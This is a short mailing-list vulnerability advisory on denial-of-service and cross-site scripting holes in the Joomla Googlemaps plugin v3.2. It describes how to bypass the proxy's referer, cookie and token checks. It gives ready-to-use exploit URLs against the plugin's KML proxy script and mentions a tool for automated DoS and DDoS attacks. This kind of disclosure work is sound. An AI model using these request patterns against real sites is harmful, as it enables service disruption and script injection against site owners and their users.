Hello list!

Earlier I wrote about multiple vulnerabilities in Googlemaps plugin for
Joomla (http://securityvulns.ru/docs29645.html). After my informing, the
developer fixed these vulnerabilities in versions 2.19 and 3.1 of the
plugin - by removing proxy functionality. And in version 3.2 of the plugin
he introduced new proxy functionality, which must be protected against
previous attacks. But after my checking, I've found two holes in the last
version of the plugin.

These are Denial of Service and Cross-Site Scripting vulnerabilities in
Googlemaps plugin for Joomla.

-------------------------
Affected products:
-------------------------

Vulnerable is Googlemaps plugin v3.2 for Joomla. I've informed the developer
about these holes. Now he is working on a new version.

-------------------------
Affected vendors:
-------------------------

Mike Reumer
http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147

----------
Details:
----------

To bypass protection for accessing this script it's needed to set referer,
cookie and token. The referer is current site, the cookie is set by the site
(Joomla) itself and the token can be found at page which uses plugin of the
site (and it's setting in URL). This data can be taken from the site
automatically.

Referer: http://site
Cookie: dc9023a0ff4f8a00f9b2f4e7600c17f4=69c59f0263b70f9343e0a75a93bd44a0

Denial of Service (WASC-10):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/large_file&1e17f7d3d74903775e5c524dbe2cd8f1=1

Besides conducting DoS attack manually, it's also possible to conduct
automated DoS and DDoS attacks with using of DAVOSET
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008879.html).

Cross-Site Scripting (WASC-08):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua